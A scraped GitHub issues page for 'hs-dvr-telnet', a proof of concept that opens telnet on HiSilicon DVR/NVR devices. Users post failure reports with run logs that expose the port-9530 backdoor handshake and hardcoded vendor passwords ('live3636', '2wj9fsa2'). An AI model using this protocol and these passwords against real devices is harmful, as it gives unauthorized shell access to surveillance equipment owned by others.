tothi / hs-dvr-telnet Goto Github PK
View Code? Open in Web Editor NEWopen telnet port on modern HiSilicon devices
hs-dvr-telnet's Issues
doesn't work for me
Hello,
The PoC does not work on my xiongmaitech AHB7804R NVR (HiSilicon Hi3520) with the latest firmware (V3_V4.03.R11.7601).
When I run it I get :
(venv) paul@paul-VirtualBox:~/hs-dvr-telnet$ ./hs-dvr-telnet.py 192.168.1.24 live3636
[+] Opening connection to 192.168.1.24 on port 9530: Done
[*] sending OpenTelnet:OpenOnce...
[*] received challenge randNum:34929138
[*] using password live3636
[*] initializing (modified) 3des with key 34929138live3636
[*] sending encrypted challenge 8B:CB:CB:2B:86:85:0A:8C:D7:99:AB:6D:B8:D8:55:E4
Traceback (most recent call last):
File "./hs-dvr-telnet.py", line 54, in <module>
dvrHelper.open_telnet(args.password)
File "./hs-dvr-telnet.py", line 37, in open_telnet
assert self.recv(2) == b"OK"
AssertionError
And then the 9530 port closes (I don't see it anymore on nmap)
When I launch the script a second time I get :
(venv) paul@paul-VirtualBox:~/hs-dvr-telnet$ ./hs-dvr-telnet.py 192.168.1.24 live3636
[-] Opening connection to 192.168.1.24 on port 9530: Failed
[ERROR] Could not connect to 192.168.1.24 on port 9530
Traceback (most recent call last):
File "./hs-dvr-telnet.py", line 53, in <module>
dvrHelper = DvrHelper(args.host, PORT)
File "/home/paul/hs-dvr-telnet/venv/lib/python3.6/site-packages/pwnlib/tubes/remote.py", line 75, in __init__
self.sock = self._connect(fam, typ)
File "/home/paul/hs-dvr-telnet/venv/lib/python3.6/site-packages/pwnlib/tubes/remote.py", line 115, in _connect
self.error("Could not connect to %s on port %d" % (self.rhost, self.rport))
File "/home/paul/hs-dvr-telnet/venv/lib/python3.6/site-packages/pwnlib/log.py", line 417, in error
raise PwnlibException(message % args)
pwnlib.exception.PwnlibException: Could not connect to 192.168.1.24 on port 9530
Rebooting the NVR reopen the 9530 port.
Thank you
Plugged in recent xiongmaitech releases...
I have an XM NVR with firmware "Build Date: 2020-09-12 15:59:39", and here's portscan:
80/tcp open http
554/tcp open rtsp
12901/tcp open unknown
23000/tcp open inovaport1
30100/tcp open rwp
34567/tcp open dhanalakshmi
Which is of course only sad, as it complicates users' access to their devices...
EOF error with Hi3520D
When running the code on my Fisotech box, I get the following output:
[+] Opening connection to 192.168.1.30 on port 9530: Done
[*] sending OpenTelnet:OpenOnce...
[*] received challenge randNum:96528459
[*] using password 2wj9fsa2
[*] initializing (modified) 3des with key 965284592wj9fsa2
[*] sending encrypted challenge 42:6F:3E:B9:8D:6A:01:EE:B6:62:FC:32:F8:6B:53:EC
[+] verify:OK
[*] sending encrypted command Telnet:OpenOnce...
Traceback (most recent call last):
File "./hs-dvr-telnet.py", line 54, in <module>
dvrHelper.open_telnet(args.password)
File "./hs-dvr-telnet.py", line 42, in open_telnet
self.recvuntil("Open:")
File "/dvr/hs-dvr-telnet/venv/lib/python3.8/site-packages/pwnlib/tubes/tube.py", line 310, in recvuntil
res = self.recv(timeout=self.timeout)
File "/dvr/hs-dvr-telnet/venv/lib/python3.8/site-packages/pwnlib/tubes/tube.py", line 82, in recv
return self._recv(numb, timeout) or b''
File "/dvr/hs-dvr-telnet/venv/lib/python3.8/site-packages/pwnlib/tubes/tube.py", line 160, in _recv
if not self.buffer and not self._fillbuffer(timeout):
File "/dvr/hs-dvr-telnet/venv/lib/python3.8/site-packages/pwnlib/tubes/tube.py", line 131, in _fillbuffer
data = self.recv_raw(self.buffer.get_fill_size())
File "/dvr/hs-dvr-telnet/venv/lib/python3.8/site-packages/pwnlib/tubes/sock.py", line 56, in recv_raw
raise EOFError
EOFError
Does that mean that my box is not vulnerable to this 0day?
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. ๐๐๐
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google โค๏ธ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.